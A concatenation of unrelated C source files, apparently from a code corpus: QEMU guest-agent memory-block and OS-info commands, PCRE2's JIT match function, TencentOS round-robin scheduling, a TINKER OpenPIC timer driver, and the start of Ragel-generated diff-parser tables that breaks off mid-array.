mem_blk->online = true; mem_blk->can_offline = false; } else if (!mem_blk->online) { result->response = GUEST_MEMORY_BLOCK_RESPONSE_TYPE_OPERATION_NOT_SUPPORTED; } } else { if (sys2memblk) { error_propagate(errp, local_err); } else { result->response = GUEST_MEMORY_BLOCK_RESPONSE_TYPE_OPERATION_FAILED; } } goto out2; } if (sys2memblk) { char removable = '0'; mem_blk->online = (strncmp(status, "online", 6) == 0); ga_read_sysfs_file(dirfd, "removable", &removable, 1, &local_err); if (local_err) { /* if no 'removable' file, it doesn't support offline mem blk */ if (errno == ENOENT) { error_free(local_err); mem_blk->can_offline = false; } else { error_propagate(errp, local_err); } } else { mem_blk->can_offline = (removable != '0'); } } else { if (mem_blk->online != (strncmp(status, "online", 6) == 0)) { const char *new_state = mem_blk->online ? "online" : "offline"; ga_write_sysfs_file(dirfd, "state", new_state, strlen(new_state), &local_err); if (local_err) { error_free(local_err); result->response = GUEST_MEMORY_BLOCK_RESPONSE_TYPE_OPERATION_FAILED; goto out2; } result->response = GUEST_MEMORY_BLOCK_RESPONSE_TYPE_SUCCESS; result->has_error_code = false; } /* otherwise pretend successful re-(on|off)-lining */ } g_free(status); close(dirfd); return; out2: g_free(status); close(dirfd); out1: if (!sys2memblk) { result->has_error_code = true; result->error_code = errno; } } GuestMemoryBlockList *qmp_guest_get_memory_blocks(Error **errp) { GuestMemoryBlockList *head, **link; Error *local_err = NULL; struct dirent *de; DIR *dp; head = NULL; link = &head; dp = opendir("/sys/devices/system/memory/"); if (!dp) { /* it's ok if this happens to be a system that doesn't expose * memory blocks via sysfs, but otherwise we should report * an error */ if (errno != ENOENT) { error_setg_errno(errp, errno, "Can't open directory" "\"/sys/devices/system/memory/\""); } return NULL; } /* Note: the phys_index of memory block may be discontinuous, * this is because a memblk is the unit of the Sparse Memory design, which * allows discontinuous memory ranges (ex. NUMA), so here we should * traverse the memory block directory. */ while ((de = readdir(dp)) != NULL) { GuestMemoryBlock *mem_blk; GuestMemoryBlockList *entry; if ((strncmp(de->d_name, "memory", 6) != 0) || !(de->d_type & DT_DIR)) { continue; } mem_blk = g_malloc0(sizeof *mem_blk); /* The d_name is "memoryXXX", phys_index is block id, same as XXX */ mem_blk->phys_index = strtoul(&de->d_name[6], NULL, 10); mem_blk->has_can_offline = true; /* lolspeak ftw */ transfer_memory_block(mem_blk, true, NULL, &local_err); entry = g_malloc0(sizeof *entry); entry->value = mem_blk; *link = entry; link = &entry->next; } closedir(dp); if (local_err == NULL) { /* there's no guest with zero memory blocks */ if (head == NULL) { error_setg(errp, "guest reported zero memory blocks!"); } return head; } qapi_free_GuestMemoryBlockList(head); error_propagate(errp, local_err); return NULL; } GuestMemoryBlockResponseList * qmp_guest_set_memory_blocks(GuestMemoryBlockList *mem_blks, Error **errp) { GuestMemoryBlockResponseList *head, **link; Error *local_err = NULL; head = NULL; link = &head; while (mem_blks != NULL) { GuestMemoryBlockResponse *result; GuestMemoryBlockResponseList *entry; GuestMemoryBlock *current_mem_blk = mem_blks->value; result = g_malloc0(sizeof(*result)); result->phys_index = current_mem_blk->phys_index; transfer_memory_block(current_mem_blk, false, result, &local_err); if (local_err) { /* should never happen */ goto err; } entry = g_malloc0(sizeof *entry); entry->value = result; *link = entry; link = &entry->next; mem_blks = mem_blks->next; } return head; err: qapi_free_GuestMemoryBlockResponseList(head); error_propagate(errp, local_err); return NULL; } GuestMemoryBlockInfo *qmp_guest_get_memory_block_info(Error **errp) { Error *local_err = NULL; char *dirpath; int dirfd; char *buf; GuestMemoryBlockInfo *info; dirpath = g_strdup_printf("/sys/devices/system/memory/"); dirfd = open(dirpath, O_RDONLY | O_DIRECTORY); if (dirfd == -1) { error_setg_errno(errp, errno, "open(\"%s\")", dirpath); g_free(dirpath); return NULL; } g_free(dirpath); buf = g_malloc0(20); ga_read_sysfs_file(dirfd, "block_size_bytes", buf, 20, &local_err); close(dirfd); if (local_err) { g_free(buf); error_propagate(errp, local_err); return NULL; } info = g_new0(GuestMemoryBlockInfo, 1); info->size = strtol(buf, NULL, 16); /* the unit is bytes */ g_free(buf); return info; } #else /* defined(__linux__) */ void qmp_guest_suspend_disk(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); } void qmp_guest_suspend_ram(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); } void qmp_guest_suspend_hybrid(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); } GuestNetworkInterfaceList *qmp_guest_network_get_interfaces(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } GuestLogicalProcessorList *qmp_guest_get_vcpus(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } int64_t qmp_guest_set_vcpus(GuestLogicalProcessorList *vcpus, Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return -1; } void qmp_guest_set_user_password(const char *username, const char *password, bool crypted, Error **errp) { error_setg(errp, QERR_UNSUPPORTED); } GuestMemoryBlockList *qmp_guest_get_memory_blocks(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } GuestMemoryBlockResponseList * qmp_guest_set_memory_blocks(GuestMemoryBlockList *mem_blks, Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } GuestMemoryBlockInfo *qmp_guest_get_memory_block_info(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } #endif #if !defined(CONFIG_FSFREEZE) GuestFilesystemInfoList *qmp_guest_get_fsinfo(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } GuestFsfreezeStatus qmp_guest_fsfreeze_status(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return 0; } int64_t qmp_guest_fsfreeze_freeze(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return 0; } int64_t qmp_guest_fsfreeze_freeze_list(bool has_mountpoints, strList *mountpoints, Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return 0; } int64_t qmp_guest_fsfreeze_thaw(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return 0; } #endif /* CONFIG_FSFREEZE */ #if !defined(CONFIG_FSTRIM) GuestFilesystemTrimResponse * qmp_guest_fstrim(bool has_minimum, int64_t minimum, Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } #endif /* add unsupported commands to the blacklist */ GList *ga_command_blacklist_init(GList *blacklist) { #if !defined(__linux__) { const char *list[] = { "guest-suspend-disk", "guest-suspend-ram", "guest-suspend-hybrid", "guest-network-get-interfaces", "guest-get-vcpus", "guest-set-vcpus", "guest-get-memory-blocks", "guest-set-memory-blocks", "guest-get-memory-block-size", NULL}; char **p = (char **)list; while (*p) { blacklist = g_list_append(blacklist, g_strdup(*p++)); } } #endif #if !defined(CONFIG_FSFREEZE) { const char *list[] = { "guest-get-fsinfo", "guest-fsfreeze-status", "guest-fsfreeze-freeze", "guest-fsfreeze-freeze-list", "guest-fsfreeze-thaw", "guest-get-fsinfo", NULL}; char **p = (char **)list; while (*p) { blacklist = g_list_append(blacklist, g_strdup(*p++)); } } #endif #if !defined(CONFIG_FSTRIM) blacklist = g_list_append(blacklist, g_strdup("guest-fstrim")); #endif return blacklist; } /* register init/cleanup routines for stateful command groups */ void ga_command_state_init(GAState *s, GACommandState *cs) { #if defined(CONFIG_FSFREEZE) ga_command_state_add(cs, NULL, guest_fsfreeze_cleanup); #endif } #ifdef HAVE_UTMPX #define QGA_MICRO_SECOND_TO_SECOND 1000000 static double ga_get_login_time(struct utmpx *user_info) { double seconds = (double)user_info->ut_tv.tv_sec; double useconds = (double)user_info->ut_tv.tv_usec; useconds /= QGA_MICRO_SECOND_TO_SECOND; return seconds + useconds; } GuestUserList *qmp_guest_get_users(Error **err) { GHashTable *cache = NULL; GuestUserList *head = NULL, *cur_item = NULL; struct utmpx *user_info = NULL; gpointer value = NULL; GuestUser *user = NULL; GuestUserList *item = NULL; double login_time = 0; cache = g_hash_table_new(g_str_hash, g_str_equal); setutxent(); for (;;) { user_info = getutxent(); if (user_info == NULL) { break; } else if (user_info->ut_type != USER_PROCESS) { continue; } else if (g_hash_table_contains(cache, user_info->ut_user)) { value = g_hash_table_lookup(cache, user_info->ut_user); user = (GuestUser *)value; login_time = ga_get_login_time(user_info); /* We're ensuring the earliest login time to be sent */ if (login_time < user->login_time) { user->login_time = login_time; } continue; } item = g_new0(GuestUserList, 1); item->value = g_new0(GuestUser, 1); item->value->user = g_strdup(user_info->ut_user); item->value->login_time = ga_get_login_time(user_info); g_hash_table_insert(cache, item->value->user, item->value); if (!cur_item) { head = cur_item = item; } else { cur_item->next = item; cur_item = item; } } endutxent(); g_hash_table_destroy(cache); return head; } #else GuestUserList *qmp_guest_get_users(Error **errp) { error_setg(errp, QERR_UNSUPPORTED); return NULL; } #endif /* Replace escaped special characters with theire real values. The replacement * is done in place -- returned value is in the original string. */ static void ga_osrelease_replace_special(gchar *value) { gchar *p, *p2, quote; /* Trim the string at first space or semicolon if it is not enclosed in * single or double quotes. */ if ((value[0] != '"') || (value[0] == '\'')) { p = strchr(value, ' '); if (p != NULL) { *p = 0; } p = strchr(value, ';'); if (p != NULL) { *p = 0; } return; } quote = value[0]; p2 = value; p = value + 1; while (*p != 0) { if (*p == '\\') { p++; switch (*p) { case '$': case '\'': case '"': case '\\': case '`': break; default: /* Keep literal backslash followed by whatever is there */ p--; break; } } else if (*p == quote) { *p2 = 0; break; } *(p2++) = *(p++); } } static GKeyFile *ga_parse_osrelease(const char *fname) { gchar *content = NULL; gchar *content2 = NULL; GError *err = NULL; GKeyFile *keys = g_key_file_new(); const char *group = "[os-release]\n"; if (!g_file_get_contents(fname, &content, NULL, &err)) { slog("failed to read '%s', error: %s", fname, err->message); goto fail; } if (!g_utf8_validate(content, -1, NULL)) { slog("file is not utf-8 encoded: %s", fname); goto fail; } content2 = g_strdup_printf("%s%s", group, content); if (!g_key_file_load_from_data(keys, content2, -1, G_KEY_FILE_NONE, &err)) { slog("failed to parse file '%s', error: %s", fname, err->message); goto fail; } g_free(content); g_free(content2); return keys; fail: g_error_free(err); g_free(content); g_free(content2); g_key_file_free(keys); return NULL; } GuestOSInfo *qmp_guest_get_osinfo(Error **errp) { GuestOSInfo *info = NULL; struct utsname kinfo; GKeyFile *osrelease = NULL; const char *qga_os_release = g_getenv("QGA_OS_RELEASE"); info = g_new0(GuestOSInfo, 1); if (uname(&kinfo) != 0) { error_setg_errno(errp, errno, "uname failed"); } else { info->has_kernel_version = true; info->kernel_version = g_strdup(kinfo.version); info->has_kernel_release = true; info->kernel_release = g_strdup(kinfo.release); info->has_machine = true; info->machine = g_strdup(kinfo.machine); } if (qga_os_release != NULL) { osrelease = ga_parse_osrelease(qga_os_release); } else { osrelease = ga_parse_osrelease("/etc/os-release"); if (osrelease == NULL) { osrelease = ga_parse_osrelease("/usr/lib/os-release"); } } if (osrelease != NULL) { char *value; #define GET_FIELD(field, osfield) do { \ value = g_key_file_get_value(osrelease, "os-release", osfield, NULL); \ if (value != NULL) { \ ga_osrelease_replace_special(value); \ info->has_ ## field = true; \ info->field = value; \ } \ } while (0) GET_FIELD(id, "ID"); GET_FIELD(name, "NAME"); GET_FIELD(pretty_name, "PRETTY_NAME"); GET_FIELD(version, "VERSION"); GET_FIELD(version_id, "VERSION_ID"); GET_FIELD(variant, "VARIANT"); GET_FIELD(variant_id, "VARIANT_ID"); #undef GET_FIELD g_key_file_free(osrelease); } return info; }
940505.c
/************************************************* * Perl-Compatible Regular Expressions * *************************************************/ /* PCRE is a library of functions to support regular expressions whose syntax and semantics are as close as possible to those of the Perl 5 language. Written by Philip Hazel Original API code Copyright (c) 1997-2012 University of Cambridge New API code Copyright (c) 2016-2018 University of Cambridge ----------------------------------------------------------------------------- Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the University of Cambridge nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ----------------------------------------------------------------------------- */ #ifndef INCLUDED_FROM_PCRE2_JIT_COMPILE #error This file must be included from pcre2_jit_compile.c. #endif #ifdef SUPPORT_JIT static SLJIT_NOINLINE int jit_machine_stack_exec(jit_arguments *arguments, jit_function executable_func) { sljit_u8 local_space[MACHINE_STACK_SIZE]; struct sljit_stack local_stack; local_stack.min_start = local_space; local_stack.start = local_space; local_stack.end = local_space + MACHINE_STACK_SIZE; local_stack.top = local_space + MACHINE_STACK_SIZE; arguments->stack = &local_stack; return executable_func(arguments); } #endif /************************************************* * Do a JIT pattern match * *************************************************/ /* This function runs a JIT pattern match. Arguments: code points to the compiled expression subject points to the subject string length length of subject string (may contain binary zeros) start_offset where to start in the subject string options option bits match_data points to a match_data block mcontext points to a match context Returns: > 0 => success; value is the number of ovector pairs filled = 0 => success, but ovector is not big enough -1 => failed to match (PCRE_ERROR_NOMATCH) < -1 => some kind of unexpected problem */ PCRE2_EXP_DEFN int PCRE2_CALL_CONVENTION pcre2_jit_match(const pcre2_code *code, PCRE2_SPTR subject, PCRE2_SIZE length, PCRE2_SIZE start_offset, uint32_t options, pcre2_match_data *match_data, pcre2_match_context *mcontext) { #ifndef SUPPORT_JIT (void)code; (void)subject; (void)length; (void)start_offset; (void)options; (void)match_data; (void)mcontext; return PCRE2_ERROR_JIT_BADOPTION; #else /* SUPPORT_JIT */ pcre2_real_code *re = (pcre2_real_code *)code; executable_functions *functions = (executable_functions *)re->executable_jit; pcre2_jit_stack *jit_stack; uint32_t oveccount = match_data->oveccount; uint32_t max_oveccount; union { void *executable_func; jit_function call_executable_func; } convert_executable_func; jit_arguments arguments; int rc; int index = 0; if ((options & PCRE2_PARTIAL_HARD) != 0) index = 2; else if ((options & PCRE2_PARTIAL_SOFT) != 0) index = 1; if (functions == NULL || functions->executable_funcs[index] == NULL) return PCRE2_ERROR_JIT_BADOPTION; /* Sanity checks should be handled by pcre_exec. */ arguments.str = subject + start_offset; arguments.begin = subject; arguments.end = subject + length; arguments.match_data = match_data; arguments.startchar_ptr = subject; arguments.mark_ptr = NULL; arguments.options = options; if (mcontext != NULL) { arguments.callout = mcontext->callout; arguments.callout_data = mcontext->callout_data; arguments.offset_limit = mcontext->offset_limit; arguments.limit_match = (mcontext->match_limit < re->limit_match)? mcontext->match_limit : re->limit_match; if (mcontext->jit_callback != NULL) jit_stack = mcontext->jit_callback(mcontext->jit_callback_data); else jit_stack = (pcre2_jit_stack *)mcontext->jit_callback_data; } else { arguments.callout = NULL; arguments.callout_data = NULL; arguments.offset_limit = PCRE2_UNSET; arguments.limit_match = (MATCH_LIMIT < re->limit_match)? MATCH_LIMIT : re->limit_match; jit_stack = NULL; } max_oveccount = functions->top_bracket; if (oveccount > max_oveccount) oveccount = max_oveccount; arguments.oveccount = oveccount << 1; convert_executable_func.executable_func = functions->executable_funcs[index]; if (jit_stack != NULL) { arguments.stack = (struct sljit_stack *)(jit_stack->stack); rc = convert_executable_func.call_executable_func(&arguments); } else rc = jit_machine_stack_exec(&arguments, convert_executable_func.call_executable_func); if (rc > (int)oveccount) rc = 0; match_data->code = re; match_data->subject = (rc >= 0 || rc == PCRE2_ERROR_PARTIAL)? subject : NULL; match_data->rc = rc; match_data->startchar = arguments.startchar_ptr - subject; match_data->leftchar = 0; match_data->rightchar = 0; match_data->mark = arguments.mark_ptr; match_data->matchedby = PCRE2_MATCHEDBY_JIT; return match_data->rc; #endif /* SUPPORT_JIT */ } /* End of pcre2_jit_match.c */
214403.c
/*---------------------------------------------------------------------------- * Tencent is pleased to support the open source community by making TencentOS * available. * * Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved. * If you have downloaded a copy of the TencentOS binary from Tencent, please * note that the TencentOS binary is licensed under the BSD 3-Clause License. * * If you have downloaded a copy of the TencentOS source code from Tencent, * please note that TencentOS source code is licensed under the BSD 3-Clause * License, except for the third-party components listed below which are * subject to different license terms. Your integration of TencentOS into your * own projects may require compliance with the BSD 3-Clause License, as well * as the other licenses applicable to the third-party components included * within TencentOS. *---------------------------------------------------------------------------*/ #include "tos.h" #if TOS_CFG_ROUND_ROBIN_EN > 0u __API__ void tos_robin_default_timeslice_config(k_timeslice_t default_timeslice) { TOS_CPU_CPSR_ALLOC(); TOS_CPU_INT_DISABLE(); if (default_timeslice > (k_timeslice_t)0u) { k_robin_default_timeslice = default_timeslice; } else { k_robin_default_timeslice = TOS_CFG_CPU_TICK_PER_SECOND / 10; } TOS_CPU_INT_ENABLE(); } __API__ void tos_robin_timeslice_set(k_task_t *task, k_timeslice_t timeslice) { TOS_CPU_CPSR_ALLOC(); if (!task) { task = k_curr_task; } TOS_CPU_INT_DISABLE(); if (timeslice == (k_timeslice_t)0u) { task->timeslice_reload = k_robin_default_timeslice; } else { task->timeslice_reload = timeslice; } if (task->timeslice_reload > task->timeslice) { task->timeslice = task->timeslice_reload; } TOS_CPU_INT_ENABLE(); } __KERNEL__ void robin_sched(k_prio_t prio) { TOS_CPU_CPSR_ALLOC(); k_task_t *task; TOS_CPU_INT_DISABLE(); task = readyqueue_first_task_get(prio); if (!task || knl_is_idle(task)) { TOS_CPU_INT_ENABLE(); return; } if (readyqueue_is_prio_onlyone(prio)) { TOS_CPU_INT_ENABLE(); return; } if (knl_is_sched_locked()) { TOS_CPU_INT_ENABLE(); return; } if (task->timeslice > (k_timeslice_t)0u) { --task->timeslice; } if (task->timeslice > (k_timeslice_t)0u) { TOS_CPU_INT_ENABLE(); return; } readyqueue_move_head_to_tail(k_curr_task->prio); task = readyqueue_first_task_get(prio); if (task->timeslice_reload == (k_timeslice_t)0u) { task->timeslice = k_robin_default_timeslice; } else { task->timeslice = task->timeslice_reload; } TOS_CPU_INT_ENABLE(); knl_sched(); } #endif
732890.c
/* * * TINKER Source Code * * * [2009] - [2013] Samuel Steven Truscott * All Rights Reserved. */ #include "opic_timer.h" #include "tinker_api_errors.h" #include "opic_private.h" #define TIMER_DISABLED 0x80000000 /** * Endian swap routine * @param var The variable to swap */ static void opic_swap_endianness(uint32_t* var); static return_t opic_timer_write_register( const void * usr_data, const uint32_t reg, const uint32_t value); static void opic_tmr_timer_setup( const timer_param_t const usr_data, const tinker_time_t * const timeout, timer_callback * const call_back, void * const param); typedef struct opic_timer_t { void * base_address; void * param; } opic_timer_t; static void opic_tmr_timer_cancel(timer_param_t usr_data); void opic_tmr_get_timer(mem_pool_info_t * const pool, uint32_t * base_address, timer_t * timer) { if (base_address && timer && pool) { timer->timer_setup = opic_tmr_timer_setup; timer->timer_cancel = opic_tmr_timer_cancel; timer->usr_data = mem_alloc(pool, sizeof(opic_timer_t)); if (timer->usr_data) { opic_timer_t * const opic_data = (opic_timer_t*)timer->usr_data; opic_data->base_address = base_address; opic_data->param = NULL; timer->usr_data_size = sizeof(opic_timer_t); } } } void opic_tmr_timer_setup( const timer_param_t const usr_data, const tinker_time_t * const timeout, timer_callback * const call_back, void * param) { if (usr_data && call_back) { ((opic_timer_t*)usr_data)->param = param; opic_timer_write_register( ((opic_timer_t*)usr_data)->base_address, TMR_N_VECTOR_PRIORITY_REGISTER, /* flags */ (ISU_POSITIVE_POLARITY_BIT) /* priority */ | (1 << 16) /* port */ | 1); opic_timer_write_register( ((opic_timer_t*)usr_data)->base_address, TMR_N_BASE_COUNT_REGISTER, TIMER_DISABLED); opic_timer_write_register( ((opic_timer_t*)usr_data)->base_address, TMR_N_BASE_COUNT_REGISTER, /* TIMER_TICKS */timeout->seconds); /* TODO need to work this one out */ } } void opic_tmr_timer_cancel(timer_param_t usr_data) { opic_timer_write_register( ((opic_timer_t*)&usr_data)->base_address, TMR_N_BASE_COUNT_REGISTER, TIMER_DISABLED); } return_t opic_timer_write_register( const void * usr_data, const uint32_t reg, const uint32_t value) { return_t err = NO_ERROR; uint32_t new_value = value; uint32_t * base_addr = (uint32_t*)usr_data; switch( reg ) { case TMR_N_CURRENT_COUNT_REGISTER: case TMR_N_BASE_COUNT_REGISTER: case TMR_N_VECTOR_PRIORITY_REGISTER: case TMR_N_DEST_REGISTER: case TMR_FREQ_REPORT_REGISTER: break; default: err = DEVICE_REGISTER_INVALID; break; } #if defined(OPIC_BIG_ENDIAN) opic_swap_endianness(&new_value); #endif if ( err == NO_ERROR ) { uint32_t* p_dst = (uint32_t*)(base_addr + reg); *p_dst = new_value; } return err; } static void opic_swap_endianness(uint32_t* var) { const uint32_t copy = *var; *var = ((copy & 0xFF) << 24) | ((copy & 0xFF00) << 8) | ((copy & 0xFF0000) >> 8) | ((copy & 0xFF000000) >> 24); }
806874.c
#line 1 "DiffParser.m.rl" #import "DiffParser.h" #import "Diff.h" #import "Hunk.h" #import "Stack.h" #import "DiffLine.h" #import "assert.h" //#define LOG_MARK 1 //#define LOG_ACTIONS 1 #line 205 "DiffParser.m.rl" @implementation DiffParser #line 22 "DiffParser.m.c" static const char _DiffParser_actions[] = { 0, 1, 0, 1, 1, 1, 2, 1, 4, 1, 8, 1, 9, 1, 11, 1, 12, 1, 13, 2, 0, 4, 2, 0, 10, 2, 0, 14, 2, 1, 6, 2, 1, 7, 2, 1, 16, 2, 3, 6, 2, 3, 7, 2, 5, 0, 2, 8, 0, 2, 9, 0, 2, 12, 0, 2, 15, 12, 2, 15, 13, 3, 15, 12, 0 }; static const unsigned char _DiffParser_key_offsets[] = { 0, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 23, 24, 25, 26, 28, 29, 30, 31, 32, 33, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 50, 54, 55, 57, 59, 60, 62, 64, 66, 67, 68, 69, 70, 71, 72, 73, 74, 76, 79, 80, 81, 82, 83, 85, 87, 89, 90, 91, 92, 93, 94, 95, 96, 97, 99, 102, 103, 104, 110, 112, 116, 120, 126, 128, 132, 137, 142, 143, 144, 148, 149, 150, 152, 159, 161, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 199, 202, 204, 206, 206, 212, 214, 217, 220, 227, 229 }; static const char _DiffParser_trans_keys[] = { 114, 111, 112, 101, 114, 116, 121, 32, 99, 104, 97, 110, 103, 101, 115, 32, 111, 110, 58, 9, 32, 11, 13, 10, 10, 95, 10, 95, 78, 97, 109, 101, 58, 9, 32, 11, 13, 10, 10, 10, 10, 110, 100, 101, 120, 58, 9, 32, 11, 13, 10, 32, 9, 13, 10, 10, 61, 10, 61, 45, 10, 40, 10, 40, 114, 119, 101, 118, 105, 115, 105, 111, 110, 32, 48, 57, 41, 48, 57, 10, 43, 43, 43, 10, 40, 10, 40, 114, 119, 101, 118, 105, 115, 105, 111, 110, 32, 48, 57, 41, 48, 57, 10, 64, 9, 32, 43, 45, 11, 13, 48, 57, 32, 44, 48, 57, 9, 32, 11, 13, 9, 32, 43, 45, 11, 13, 48, 57, 32, 44, 48, 57, 9, 32, 64, 11, 13, 9, 32, 64, 11, 13, 64, 10, 32, 43, 45, 92, 10, 10, 48, 57, 9, 32, 64, 11, 13, 48, 57, 48, 57, 9, 32, 11, 13, 48, 57, 111, 114, 107, 105, 110, 103, 32, 99, 111, 112, 121, 41, 111, 114, 107, 105, 110, 103, 32, 99, 111, 112, 121, 41, 10, 10, 10, 10, 10, 32, 9, 13, 10, 73, 80, 10, 80, 10, 78, 10, 39, 45, 67, 80, 124, 10, 80, 10, 45, 80, 10, 64, 80, 10, 32, 43, 45, 64, 80, 92, 10, 80, 10, 80, 114, 0 }; static const char _DiffParser_single_lengths[] = { 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 2, 2, 1, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 4, 0, 2, 2, 4, 0, 2, 3, 3, 1, 1, 4, 1, 1, 0, 3, 0, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 2, 2, 0, 6, 2, 3, 3, 7, 2, 3 }; static const char _DiffParser_range_lengths[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 2, 1, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; static const short _DiffParser_index_offsets[] = { 0, 0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36, 38, 42, 44, 46, 48, 51, 53, 55, 57, 59, 61, 65, 67, 69, 71, 73, 75, 77, 79, 81, 83, 87, 91, 93, 96, 99, 101, 104, 107, 110, 112, 114, 116, 118, 120, 122, 124, 126, 128, 131, 133, 135, 137, 139, 142, 145, 148, 150, 152, 154, 156, 158, 160, 162, 164, 166, 169, 171, 173, 179, 181, 185, 189, 195, 197, 201, 206, 211, 213, 215, 220, 222, 224, 226, 232, 234, 239, 241, 243, 245, 247, 249, 251, 253, 255, 257, 259, 261, 263, 265, 267, 269, 271, 273, 275, 277, 279, 281, 283, 285, 287, 289, 291, 293, 295, 299, 303, 306, 309, 310, 317, 320, 324, 328, 336, 339 }; static const unsigned char _DiffParser_indicies[] = { 0, 1, 2, 1, 3, 1, 4, 1, 5, 1, 6, 1, 7, 1, 8, 1, 9, 1, 10, 1, 11, 1, 12, 1, 13, 1, 14, 1, 15, 1, 16, 1, 17, 1, 18, 1, 19, 1, 20, 20, 20, 1, 1, 21, 23, 22, 24, 1, 25, 24, 1, 26, 1, 27, 1, 28, 1, 29, 1, 30, 1, 31, 31, 31, 1, 1, 32, 33, 32, 1, 34, 35, 34, 36, 1, 37, 1, 38, 1, 39, 1, 40, 1, 41, 41, 41, 1, 1, 43, 43, 42, 45, 44, 46, 47, 1, 48, 47, 1, 49, 1, 1, 1, 50, 1, 51, 50, 52, 53, 1, 54, 1, 55, 1, 56, 1, 57, 1, 58, 1, 59, 1, 60, 1, 61, 1, 62, 1, 63, 64, 1, 65, 1, 66, 1, 67, 1, 68, 1, 1, 1, 69, 1, 70, 69, 71, 72, 1, 73, 1, 74, 1, 75, 1, 76, 1, 77, 1, 78, 1, 79, 1, 80, 1, 81, 1, 82, 83, 1, 84, 1, 85, 1, 85, 85, 86, 86, 85, 1, 87, 1, 88, 89, 90, 1, 91, 91, 91, 1, 92, 92, 93, 93, 92, 1, 94, 1, 95, 96, 97, 1, 98, 98, 99, 98, 1, 100, 100, 101, 100, 1, 102, 1, 103, 1, 104, 104, 104, 105, 1, 107, 106, 109, 108, 110, 1, 111, 111, 113, 111, 112, 1, 114, 1, 115, 115, 115, 116, 1, 117, 1, 118, 1, 119, 1, 120, 1, 121, 1, 122, 1, 123, 1, 124, 1, 125, 1, 126, 1, 127, 1, 128, 1, 129, 1, 130, 1, 131, 1, 132, 1, 133, 1, 134, 1, 135, 1, 136, 1, 137, 1, 138, 1, 139, 1, 140, 1, 1, 141, 142, 141, 1, 143, 144, 143, 45, 43, 43, 42, 145, 146, 147, 1, 145, 147, 1, 148, 26, 1, 1, 150, 1, 151, 152, 153, 1, 149, 154, 155, 1, 154, 156, 155, 1, 157, 158, 159, 1, 160, 161, 161, 161, 162, 163, 108, 1, 164, 165, 1, 154, 155, 0, 1, 0 }; static const unsigned char _DiffParser_trans_targs[] = { 2, 0, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 127, 36, 37, 38, 39, 40, 41, 42, 124, 42, 43, 43, 44, 129, 46, 47, 48, 49, 108, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 58, 60, 61, 62, 63, 64, 65, 66, 96, 